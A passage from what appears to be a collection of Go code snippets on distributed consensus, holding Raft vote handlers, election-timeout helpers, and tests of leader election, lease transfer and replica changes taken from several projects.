leader\")\n\t\t\t\tc.events <- &models.Event{Type: EventReElected, Group: GroupLeader}\n\t\t\t}\n\t\t}\n\t\tc.Lock()\n\t\tc.leader = leader\n\t\tc.Unlock()\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\n\t//If RPC request or response contains term T > currentTerm:\n\t//set currentTerm = T, convert to follower\n\tif (args.Term > currentTerm) {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = NILVOTE\n\n\t\tif rf.role == LEADER {\n\t\t\tDPrintf(\"LeaderCondition sorry server %d term %d not a leader, logs %v, commitIndex %d\\n\",rf.me, rf.currentTerm, rf.log, rf.commitIndex) \n\t\t} \n\t\trf.role = FOLLOWER\n\t\trf.persist()\n\t}\n\n\tif args.Term < currentTerm {\n\t\t// Reply false if term < currentTerm \n\t\treply.VoteGranted = false\n\t\treply.Term = currentTerm \n\t}else {\n\t\t//If votedFor is null or candidateId,\n\t\t//and candidate’s log is at least as up-to-date as receiver’s log,\n\t\t//&& rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm)\n\t\tif (rf.votedFor == NILVOTE || rf.votedFor == args.CandidateId) && rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm) {\n\t\t\ti , t := rf.lastLogIdxAndTerm()\n\t\t\tPrefixDPrintf(rf, \"voted to candidate %d, args %v, lastlogIndex %d, lastlogTerm %d\\n\", args.CandidateId, args, i, t)\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\t\n\t\t\treply.VoteGranted = true\n\t\t\treply.Term = rf.currentTerm\n\t\t\t//you grant a vote to another peer.\n\t\t\trf.resetTimeoutEvent = makeTimestamp()\n\t\t}else {\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t}\t\n\t}\n}", "func TestCannotTransferLeaseToVoterOutgoing(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\tctx := context.Background()\n\n\tknobs, ltk := makeReplicationTestKnobs()\n\t// Add a testing knob to allow us to block the change replicas command\n\t// while it is being proposed. When we detect that the change replicas\n\t// command to move n3 to VOTER_OUTGOING has been evaluated, we'll send\n\t// the request to transfer the lease to n3. The hope is that it will\n\t// get past the sanity above latch acquisition prior to change replicas\n\t// command committing.\n\tvar scratchRangeID atomic.Value\n\tscratchRangeID.Store(roachpb.RangeID(0))\n\tchangeReplicasChan := make(chan chan struct{}, 1)\n\tshouldBlock := func(args kvserverbase.ProposalFilterArgs) bool {\n\t\t// Block if a ChangeReplicas command is removing a node from our range.\n\t\treturn args.Req.RangeID == scratchRangeID.Load().(roachpb.RangeID) &&\n\t\t\targs.Cmd.ReplicatedEvalResult.ChangeReplicas != nil &&\n\t\t\tlen(args.Cmd.ReplicatedEvalResult.ChangeReplicas.Removed()) > 0\n\t}\n\tblockIfShould := func(args kvserverbase.ProposalFilterArgs) {\n\t\tif shouldBlock(args) {\n\t\t\tch := make(chan struct{})\n\t\t\tchangeReplicasChan <- ch\n\t\t\t<-ch\n\t\t}\n\t}\n\tknobs.Store.(*kvserver.StoreTestingKnobs).TestingProposalFilter = func(args kvserverbase.ProposalFilterArgs) *roachpb.Error {\n\t\tblockIfShould(args)\n\t\treturn nil\n\t}\n\ttc := testcluster.StartTestCluster(t, 4, base.TestClusterArgs{\n\t\tServerArgs: base.TestServerArgs{Knobs: knobs},\n\t\tReplicationMode: base.ReplicationManual,\n\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tscratchStartKey := tc.ScratchRange(t)\n\tdesc := tc.AddVotersOrFatal(t, scratchStartKey, tc.Targets(1, 2)...)\n\tscratchRangeID.Store(desc.RangeID)\n\t// Make sure n1 has the lease to start with.\n\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\tscratchStartKey, tc.Target(0).StoreID)\n\trequire.NoError(t, err)\n\n\t// The test proceeds as follows:\n\t//\n\t// - Send an AdminChangeReplicasRequest to remove n3 and add n4\n\t// - Block the step that moves n3 to VOTER_OUTGOING on changeReplicasChan\n\t// - Send an AdminLeaseTransfer to make n3 the leaseholder\n\t// - Try really hard to make sure that the lease transfer at least gets to\n\t// latch acquisition before unblocking the ChangeReplicas.\n\t// - Unblock the ChangeReplicas.\n\t// - Make sure the lease transfer fails.\n\n\tltk.withStopAfterJointConfig(func() {\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\t_, err = tc.Server(0).DB().AdminChangeReplicas(ctx,\n\t\t\t\tscratchStartKey, desc, []roachpb.ReplicationChange{\n\t\t\t\t\t{ChangeType: roachpb.REMOVE_VOTER, Target: tc.Target(2)},\n\t\t\t\t\t{ChangeType: roachpb.ADD_VOTER, Target: tc.Target(3)},\n\t\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t}()\n\t\tch := <-changeReplicasChan\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\t\t\tscratchStartKey, tc.Target(2).StoreID)\n\t\t\trequire.Error(t, err)\n\t\t\trequire.Regexp(t,\n\t\t\t\t// The error generated during evaluation.\n\t\t\t\t\"replica cannot hold lease|\"+\n\t\t\t\t\t// If the lease transfer request has not yet made it to the latching\n\t\t\t\t\t// phase by the time we close(ch) below, we can receive the following\n\t\t\t\t\t// error due to the sanity checking which happens in\n\t\t\t\t\t// AdminTransferLease before attempting to evaluate the lease\n\t\t\t\t\t// transfer.\n\t\t\t\t\t// We have a sleep loop below to try to encourage the lease transfer\n\t\t\t\t\t// to make it past that sanity check prior to letting the change\n\t\t\t\t\t// of replicas proceed.\n\t\t\t\t\t\"cannot transfer lease to replica of type VOTER_DEMOTING_LEARNER\", err.Error())\n\t\t}()\n\t\t// Try really hard to make sure that our request makes it past the\n\t\t// sanity check error to the evaluation error.\n\t\tfor i := 0; i < 100; i++ {\n\t\t\truntime.Gosched()\n\t\t\ttime.Sleep(time.Microsecond)\n\t\t}\n\t\tclose(ch)\n\t\twg.Wait()\n\t})\n\n}", "func generateElectionTime() int {\n rand.Seed(time.Now().UnixNano())\n return rand.Intn(150)*2 + 300\n}", "func TestLeaderElectionInitialMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 3})\n\n\tvc := &pb.ViewChange{\n\t\tNodeId: 1,\n\t\tAttemptedView: 1,\n\t}\n\tmvc := &pb.Message_ViewChange{ViewChange: vc}\n\texp := []pb.Message{\n\t\t{To: 0, Type: mvc},\n\t\t{To: 2, Type: mvc},\n\t}\n\tif msgs := p.msgs; !reflect.DeepEqual(msgs, exp) {\n\t\tt.Errorf(\"expected the outbound messages %+v, found %+v\", exp, msgs)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\n\t//fmt.Printf(\"成功调用RequestVote!\\n\")\n\t// Your code here (2A, 2B).\n\t//rf.mu.Lock()\n\t//current_time:=time.Now().UnixNano()/1e6\n\t//&&current_time-rf.voted_time>800\n\trf.mu.Lock()\n\n\tif (rf.term>args.Candidate_term)&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)){\n\t\trf.term=args.Candidate_term\n\t\trf.state=0\n\t}\n\n\n\t/*\n\t\tif args.Append==true&&((args.Newest_log.Log_Term<rf.Last_log_term)||(args.Newest_log.Log_Term==rf.Last_log_term&&args.Last_log_term_lenth<rf.Last_log_term)){\n\t\t\treply.Term=args.Candidate_term+1\n\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\treply.Append_success=false\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t*/\n\t//if args.Second==true{\n\t//\tfmt.Printf(\"!\\n!\\n!\\n!\\n!\\n编号为%d的raft实例收到编号为%d的leader的second请求!本机term是%d,leader term是%d,args.Append是%v\\n\",rf.me,args.From,rf.term,args.Candidate_term,args.Append)\n\t//}\n\n\tif rf.state==2&&((rf.term<args.Candidate_term)||(rf.term==args.Candidate_term&&args.Last_log_term<rf.Last_log_term))&&args.Votemsg==false{\n\t\t//fmt.Printf(\"分区恢复后编号为%d的raft实例的term是%d,发现自己已经不是leader!leader是%d,leader的term是%d\\n\",rf.me,rf.term,args.From,args.Candidate_term)\n\t\trf.state=0\n\t\trf.leaderID=args.From\n\t}\n\n\n\n\tif args.Candidate_term>=rf.term{\n\t\t//rf.term=args.Candidate_term\n\t\t//if args.Second==true{\n\t\t//\tfmt.Printf(\"服务器上的SECOND进入第一个大括号\\n\")\n\t\t//}\n\t\tif args.Append == false {\n\t\t\tif args.Votemsg == true && rf.voted[args.Candidate_term] == 0&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)) { //合法投票请求\n\t\t\t\t//fmt.Printf(\"编号为%d的raft实例对投票请求的回答为true,term统一更新为为%d\\n\",rf.me,rf.term)\n\n\t\t\t\t//rf.term = args.Candidate_term\n\t\t\t\trf.voted[args.Candidate_term] = 1\n\t\t\t\treply.Vote_sent = true\n\n\t\t\t\t//rf.voted_time=time.Now().UnixNano()/1e6\n\n\t\t\t}else if args.Votemsg==true{ //合法的纯heartbeat\n\t\t\t\tif rf.voted[args.Candidate_term]==1 {\n\t\t\t\t\treply.Voted = true\n\t\t\t\t}\n\t\t\t\t//fmt.Printf(\"请求方的term是%d,本机的term是%d,来自%d的投票请求被%d拒绝!rf.last_log_term是%d,rf.last_log_lenth是%d,本机的rf.last_log_term是%d,rf.last_log_lenth是%d\\n\",args.Candidate_term,rf.term,args.From,rf.me,args.Last_log_term,args.Last_log_term_lenth,rf.Last_log_term,rf.last_term_log_lenth)\n\t\t\t}\n\t\t\treply.Term=rf.term\n\n\t\t\t//rf.term=args.Candidate_term//!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t//if args.Votemsg==true{//!!!!!!!!!!!!!!\n\t\t\t//\trf.term=args.Candidate_term//!!!!!!!!!!!!\n\t\t\t//}//!!!!!!!!!!!!!!!!!\n\n\t\t} else { //这条是关于日志的\n\t\t\t//这个请求是日志同步请求,接收方需要将自己的日志最后一条和leader发过来的声称的进行比较,如果leader的更新且leader的PREV和自己的LAST相同就接受\n\t\t\t//还得找到最后一个一致的日志位置,然后将后面的全部更新为和leader一致的,这意味着中间多次的RPC通信\n\n\t\t\t/*\n\t\t\tif args.Newest_log.Log_Term<rf.Last_log_term{\n\t\t\t\treply.Wrong_leader=true\n\t\t\t\treply.Term=rf.term\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\treturn\n\t\t\t}\n*/\n\n\t\t\tif (rf.Last_log_term>args.Last_log_term)||(rf.Last_log_term==args.Last_log_term&&rf.last_term_log_lenth>args.Last_log_term_lenth){\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\trf.mu.Unlock()\n\t\t\t\treturn\n\t\t\t}\n\n\n\t\t\trf.term=args.Candidate_term\n\t\t\tif args.Second==true{\n\t\t\t\t//\tfmt.Printf(\"在服务器端进入second阶段!\\n\")\n\t\t\t\trf.log=rf.log[:args.Second_position]\n\t\t\t\trf.log=append(rf.log,args.Second_log...)\n\t\t\t\treply.Append_success=true\n\t\t\t\trf.Last_log_term=args.Last_log_term\n\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\trf.Last_log_index=len(rf.log)-1\n\t\t\t\trf.Log_Term=args.Log_Term\n\t\t\t\t//fmt.Printf(\"Second APPend在服务器端成功!现在编号为%d的raft实例的log是%v, last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t}else{\n\t\t\t\tif args.Append_Try == false {//try用于表示是否是第一次append失败了现在正在沟通\n\t\t\t\t\trf.append_try_log_index = rf.Last_log_index\n\t\t\t\t\trf.append_try_log_term=rf.Last_log_term\n\t\t\t\t}\n\t\t\t\tif args.Prev_log_index != rf.append_try_log_index || args.Prev_log_term != rf.append_try_log_term{\n\t\t\t\t\t//fmt.Printf(\"匹配失败!!!%d号leader发过来的PREV_log_index是%d,本机%d的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d!\\n\",args.From,args.Prev_log_index,rf.me,rf.append_try_log_index,args.Prev_log_term,rf.append_try_log_term)\n\t\t\t\t\treply.Vote_sent = false//匹配失败后进入双方沟通try\n\t\t\t\t\treply.Append_success = false\n\n\t\t\t\t\treply.Log_Term=rf.Log_Term\n\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else { //说明没问题。可以更新\n\t\t\t\t\t//fmt.Printf(\"匹配成功!!!%d号是leader,发过来的PREV_log_index是%d,本机的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d,准备更新本机日志!!\\n\", args.From, args.Prev_log_index, rf.append_try_log_index, args.Prev_log_term, rf.append_try_log_term)\n\t\t\t\t\t//rf.Last_log_term = args.Last_log_term\n\t\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\t\trf.log = append(rf.log, args.Newest_log)\n\t\t\t\t\trf.Last_log_index += 1\n\t\t\t\t\trf.Log_Term = args.Log_Term\n\t\t\t\t\trf.Last_log_term=args.Newest_log.Log_Term\n\t\t\t\t\treply.Append_success = true\n\t\t\t\t\t//fmt.Printf(\"APPend成功,现在编号为%d的raft实例的log是%v,last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t\t}\n\t\t\t}\n\t\t\trf.log_added_content = args.Newest_log\n\t\t\trf.last_term_log_lenth=0\n\n\t\t\tfor cc:=len(rf.log)-1;cc>-1;cc--{\n\t\t\t\tif rf.log[cc].Log_Term!=rf.Last_log_term{\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\trf.last_term_log_lenth+=1\n\t\t\t}\n\n\n\t\t}\n\n\t\t//fmt.Printf(\"在更新heartbeat之前\\n\")\n\t\tif args.Votemsg==false {//加上个约束条件更严谨,加上了表示是在heartbeat开始之后认同了这个是leader,否则在投票阶段就认同了\n\t\t\t//fmt.Printf(\"rf.last_log_term %d, args.last_log_term %d\\n\",rf.Last_log_term,args.Last_log_term)\n\t\t\tif args.Last_log_term==rf.Last_log_term {//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t\tif args.Commit_MSG == true {\n\t\t\t\t\t//if len(rf.Log_Term)==len(args.Log_Term)&&rf.Log_Term[len(rf.Log_Term)-1]==args.Log_Term[len(args.Log_Term)-1]{\n\t\t\t\t\t//if len(args.Log_Term)==len(rf.Log_Term)&&args.Last_log_term==rf.Last_log_term {\n\t\t\t\t\tfor cc := rf.committed_index + 1; cc <= rf.Last_log_index; cc++ {\n\t\t\t\t\t\trf.committed_index = cc\n\t\t\t\t\t\t//!-------------------------fmt.Printf(\"在follower %d 上进行commit,commit_index是%d,commit的内容是%v,commit的term是%d,last_log_term是%d, rf.log是太长暂时鸽了\\n\", rf.me, cc, rf.log[cc].Log_Command, rf.log[cc].Log_Term, rf.Last_log_term)\n\t\t\t\t\t\trf.applych <- ApplyMsg{true, rf.log[rf.committed_index].Log_Command, rf.committed_index}\n\t\t\t\t\t}\n\n\t\t\t\t\treply.Commit_finished = true\n\t\t\t\t\t//}else{\n\t\t\t\t\t//}\n\t\t\t\t\t//}\n\t\t\t\t}\n\t\t\t}//!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n\t\t\trf.leaderID = args.From\n\t\t\trf.term = args.Candidate_term\n\t\t\trf.leaderID=args.From\n\n\n\t\t}\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\n\t\tif args.Votemsg==false {\n\t\t\tif rf.state == 0 {\n\t\t\t\trf.last_heartbeat <- 1\n\t\t\t}\n\t\t}\n\n\t}else{\n\t\t//fmt.Printf(\"term都不符,明显是非法的!\\n\")\n\t\treply.Vote_sent = false\n\t\treply.Append_success = false\n\t\treply.Term=rf.term\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\t\t//-------------------if (args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth){\n\t\t//----------------------\treply.You_are_true=true\n\t\t//------------------------}\n\t}\n\trf.mu.Unlock()\n\t//fmt.Printf(\"编号为%d的raft实例通过RequestVote()收到了heartbeat\\n\",rf.me)\n\t//reply.voted<-true\n\t//rf.mu.Unlock()\n}", "func TestProposeAfterRemoveLeader(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tmn := newMultiNode(1)\n\tgo mn.run()\n\tdefer mn.Stop()\n\n\tstorage := NewMemoryStorage()\n\tif err := mn.CreateGroup(1, newTestConfig(1, nil, 10, 1, storage),\n\t\t[]Peer{{ID: 1}}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := mn.Campaign(ctx, 1); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif err := mn.ProposeConfChange(ctx, 1, raftpb.ConfChange{\n\t\tType: raftpb.ConfChangeRemoveNode,\n\t\tNodeID: 1,\n\t}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tgs := <-mn.Ready()\n\tg := gs[1]\n\tif err := storage.Append(g.Entries); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor _, e := range g.CommittedEntries {\n\t\tif e.Type == raftpb.EntryConfChange {\n\t\t\tvar cc raftpb.ConfChange\n\t\t\tif err := cc.Unmarshal(e.Data); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tmn.ApplyConfChange(1, cc)\n\t\t}\n\t}\n\tmn.Advance(gs)\n\n\tif err := mn.Propose(ctx, 1, []byte(\"somedata\")); err != nil {\n\t\tt.Errorf(\"err = %v, want nil\", err)\n\t}\n}", "func startServer(\n\tstate *ServerState,\n\tvoteChannels *[ClusterSize]chan Vote,\n\tappendEntriesCom *[ClusterSize]AppendEntriesCom,\n\tclientCommunicationChannel chan KeyValue,\n\tpersister Persister,\n\tchannel ApplyChannel,\n\t) Raft {\n\n\tisElection := true\n\telectionThreadSleepTime := time.Millisecond * 1000\n\ttimeSinceLastUpdate := time.Now() //update includes election or message from leader\n\tserverStateLock := new(sync.Mutex)\n\tonWinChannel := make(chan bool)\n\n\tgo runElectionTimeoutThread(&timeSinceLastUpdate, &isElection, state, voteChannels, &onWinChannel, electionThreadSleepTime)\n\tgo startLeaderListener(appendEntriesCom, state, &timeSinceLastUpdate, &isElection, serverStateLock) //implements F1.\n\tgo onWinChannelListener(state, &onWinChannel, serverStateLock, appendEntriesCom, &clientCommunicationChannel, persister, channel) //in leader.go\n\n\t//creates raft object with closure\n\traft := Raft{}\n\traft.Start = func (logEntry LogEntry) (int, int, bool){ //implements\n\t\tgo func () { //non blocking sent through client (leader may not be choosen yet).\n\t\t\tclientCommunicationChannel <- logEntry.Content\n\t\t}()\n\t\treturn len(state.Log), state.CurrentTerm, state.Role == LeaderRole\n\t}\n\n\traft.GetState = func ()(int, bool) {\n\t\treturn state.CurrentTerm, state.Role == LeaderRole\n\t}\n\treturn raft\n}", "func TestLeasePreferencesRebalance(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\n\tctx := context.Background()\n\tsettings := cluster.MakeTestingClusterSettings()\n\tsv := &settings.SV\n\t// set min lease transfer high, so we know it does affect the lease movement.\n\tkvserver.MinLeaseTransferInterval.Override(sv, 24*time.Hour)\n\t// Place all the leases in us-west.\n\tzcfg := zonepb.DefaultZoneConfig()\n\tzcfg.LeasePreferences = []zonepb.LeasePreference{\n\t\t{\n\t\t\tConstraints: []zonepb.Constraint{\n\t\t\t\t{Type: zonepb.Constraint_REQUIRED, Key: \"region\", Value: \"us-west\"},\n\t\t\t},\n\t\t},\n\t}\n\tnumNodes := 3\n\tserverArgs := make(map[int]base.TestServerArgs)\n\tlocality := func(region string) roachpb.Locality {\n\t\treturn roachpb.Locality{\n\t\t\tTiers: []roachpb.Tier{\n\t\t\t\t{Key: \"region\", Value: region},\n\t\t\t},\n\t\t}\n\t}\n\tlocalities := []roachpb.Locality{\n\t\tlocality(\"us-west\"),\n\t\tlocality(\"us-east\"),\n\t\tlocality(\"eu\"),\n\t}\n\tfor i := 0; i < numNodes; i++ {\n\t\tserverArgs[i] = base.TestServerArgs{\n\t\t\tLocality: localities[i],\n\t\t\tKnobs: base.TestingKnobs{\n\t\t\t\tServer: &server.TestingKnobs{\n\t\t\t\t\tDefaultZoneConfigOverride: &zcfg,\n\t\t\t\t},\n\t\t\t},\n\t\t\tSettings: settings,\n\t\t}\n\t}\n\ttc := testcluster.StartTestCluster(t, numNodes,\n\t\tbase.TestClusterArgs{\n\t\t\tReplicationMode: base.ReplicationManual,\n\t\t\tServerArgsPerNode: serverArgs,\n\t\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tkey := keys.UserTableDataMin\n\ttc.SplitRangeOrFatal(t, key)\n\ttc.AddVotersOrFatal(t, key, tc.Targets(1, 2)...)\n\trequire.NoError(t, tc.WaitForVoters(key, tc.Targets(1, 2)...))\n\tdesc := tc.LookupRangeOrFatal(t, key)\n\tleaseHolder, err := tc.FindRangeLeaseHolder(desc, nil)\n\trequire.NoError(t, err)\n\trequire.Equal(t, tc.Target(0), leaseHolder)\n\n\t// Manually move lease out of preference.\n\ttc.TransferRangeLeaseOrFatal(t, desc, tc.Target(1))\n\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tlh, err := tc.FindRangeLeaseHolder(desc, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !lh.Equal(tc.Target(1)) {\n\t\t\treturn errors.Errorf(\"Expected leaseholder to be %s but was %s\", tc.Target(1), lh)\n\t\t}\n\t\treturn nil\n\t})\n\n\ttc.GetFirstStoreFromServer(t, 1).SetReplicateQueueActive(true)\n\trequire.NoError(t, tc.GetFirstStoreFromServer(t, 1).ForceReplicationScanAndProcess())\n\n\t// The lease should be moved back by the rebalance queue to us-west.\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tlh, err := tc.FindRangeLeaseHolder(desc, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !lh.Equal(tc.Target(0)) {\n\t\t\treturn errors.Errorf(\"Expected leaseholder to be %s but was %s\", tc.Target(0), lh)\n\t\t}\n\t\treturn nil\n\t})\n}", "func TestSplitCloneV2_NoMasterAvailable(t *testing.T) {\n\tdelay := discovery.GetTabletPickerRetryDelay()\n\tdefer func() {\n\t\tdiscovery.SetTabletPickerRetryDelay(delay)\n\t}()\n\tdiscovery.SetTabletPickerRetryDelay(5 * time.Millisecond)\n\n\ttc := &splitCloneTestCase{t: t}\n\ttc.setUp(false /* v3 */)\n\tdefer tc.tearDown()\n\n\t// Only wait 1 ms between retries, so that the test passes faster.\n\t*executeFetchRetryTime = 1 * time.Millisecond\n\n\t// leftReplica will take over for the last, 30th, insert and the vreplication checkpoint.\n\ttc.leftReplicaFakeDb.AddExpectedQuery(\"INSERT INTO `vt_ks`.`table1` (`id`, `msg`, `keyspace_id`) VALUES (*\", nil)\n\n\t// During the 29th write, let the MASTER disappear.\n\ttc.leftMasterFakeDb.GetEntry(28).AfterFunc = func() {\n\t\tt.Logf(\"setting MASTER tablet to REPLICA\")\n\t\ttc.leftMasterQs.UpdateType(topodatapb.TabletType_REPLICA)\n\t\ttc.leftMasterQs.AddDefaultHealthResponse()\n\t}\n\n\t// If the HealthCheck didn't pick up the change yet, the 30th write would\n\t// succeed. To prevent this from happening, replace it with an error.\n\ttc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(28)\n\ttc.leftMasterFakeDb.AddExpectedQuery(\"INSERT INTO `vt_ks`.`table1` (`id`, `msg`, `keyspace_id`) VALUES (*\", errReadOnly)\n\ttc.leftMasterFakeDb.EnableInfinite()\n\t// vtworker may not retry on leftMaster again if HealthCheck picks up the\n\t// change very fast. In that case, the error was never encountered.\n\t// Delete it or verifyAllExecutedOrFail() will fail because it was not\n\t// processed.\n\tdefer tc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(28)\n\n\t// Wait for a retry due to NoMasterAvailable to happen, expect the 30th write\n\t// on leftReplica and change leftReplica from REPLICA to MASTER.\n\t//\n\t// Reset the stats now. It also happens when the worker starts but that's too\n\t// late because this Go routine looks at it and can run before the worker.\n\tstatsRetryCounters.ResetAll()\n\tgo func() {\n\t\tctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)\n\t\tdefer cancel()\n\n\t\tfor {\n\t\t\tretries := statsRetryCounters.Counts()[retryCategoryNoMasterAvailable]\n\t\t\tif retries >= 1 {\n\t\t\t\tt.Logf(\"retried on no MASTER %v times\", retries)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\tpanic(fmt.Errorf(\"timed out waiting for vtworker to retry due to NoMasterAvailable: %v\", ctx.Err()))\n\t\t\tcase <-time.After(10 * time.Millisecond):\n\t\t\t\t// Poll constantly.\n\t\t\t}\n\t\t}\n\n\t\t// Make leftReplica the new MASTER.\n\t\ttc.leftReplica.TM.ChangeType(ctx, topodatapb.TabletType_MASTER)\n\t\tt.Logf(\"resetting tablet back to MASTER\")\n\t\ttc.leftReplicaQs.UpdateType(topodatapb.TabletType_MASTER)\n\t\ttc.leftReplicaQs.AddDefaultHealthResponse()\n\t}()\n\n\t// Run the vtworker command.\n\tif err := runCommand(t, tc.wi, tc.wi.wr, tc.defaultWorkerArgs); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestReadOnlyForNewLeader(t *testing.T) {\n\tnodeConfigs := []struct {\n\t\tid uint64\n\t\tcommitted uint64\n\t\tapplied uint64\n\t\tcompact_index uint64\n\t}{\n\t\t{1, 1, 1, 0},\n\t\t{2, 2, 2, 2},\n\t\t{3, 2, 2, 2},\n\t}\n\tpeers := make([]stateMachine, 0)\n\tfor _, c := range nodeConfigs {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 1}})\n\t\tstorage.SetHardState(pb.HardState{Term: 1, Commit: c.committed})\n\t\tif c.compact_index != 0 {\n\t\t\tstorage.Compact(c.compact_index)\n\t\t}\n\t\tcfg := newTestConfig(c.id, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tcfg.Applied = c.applied\n\t\traft := newRaft(cfg)\n\t\tpeers = append(peers, raft)\n\t}\n\tnt := newNetwork(peers...)\n\n\t// Drop MsgApp to forbid peer a to commit any log entry at its term after it becomes leader.\n\tnt.ignore(pb.MsgApp)\n\t// Force peer a to become leader.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"state = %s, want %s\", sm.state, StateLeader)\n\t}\n\n\t// Ensure peer a drops read only request.\n\tvar windex uint64 = 4\n\twctx := []byte(\"ctx\")\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 0 {\n\t\tt.Fatalf(\"len(readStates) = %d, want zero\", len(sm.readStates))\n\t}\n\n\tnt.recover()\n\n\t// Force peer a to commit a log entry at its term\n\tfor i := 0; i < sm.heartbeatTimeout; i++ {\n\t\tsm.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\tif sm.raftLog.committed != 4 {\n\t\tt.Fatalf(\"committed = %d, want 4\", sm.raftLog.committed)\n\t}\n\tlastLogTerm := sm.raftLog.zeroTermOnErrCompacted(sm.raftLog.term(sm.raftLog.committed))\n\tif lastLogTerm != sm.Term {\n\t\tt.Fatalf(\"last log term = %d, want %d\", lastLogTerm, sm.Term)\n\t}\n\n\t// Ensure peer a accepts read only request after it commits a entry at its term.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 1 {\n\t\tt.Fatalf(\"len(readStates) = %d, want 1\", len(sm.readStates))\n\t}\n\trs := sm.readStates[0]\n\tif rs.Index != windex {\n\t\tt.Fatalf(\"readIndex = %d, want %d\", rs.Index, windex)\n\t}\n\tif !bytes.Equal(rs.RequestCtx, wctx) {\n\t\tt.Fatalf(\"requestCtx = %v, want %v\", rs.RequestCtx, wctx)\n\t}\n}", "func (rf *Raft) initialServer() {\n\tfor {\n\t\tif !rf.killed() {\n\t\t\ttimeOut := time.Millisecond * time.Duration(ElectionTimeOut+rand.Intn(ElectionTimeOut)) //warn 必须sleep timeOut,避免server在一个ElectionTimeOut结束后连续发起选举\n\t\t\ttime.Sleep(timeOut)\n\t\t\t//DPrintf(\"rf%v state%v\",rf.me,rf.state)\n\t\t\trf.mu.Lock()\n\t\t\tswitch rf.state {\n\t\t\tcase Candidate:\n\t\t\t\tDPrintf(\"candidate [%v] startElection detail:%v\", rf.me, rf)\n\t\t\t\tgo rf.startElection()\n\t\t\tcase 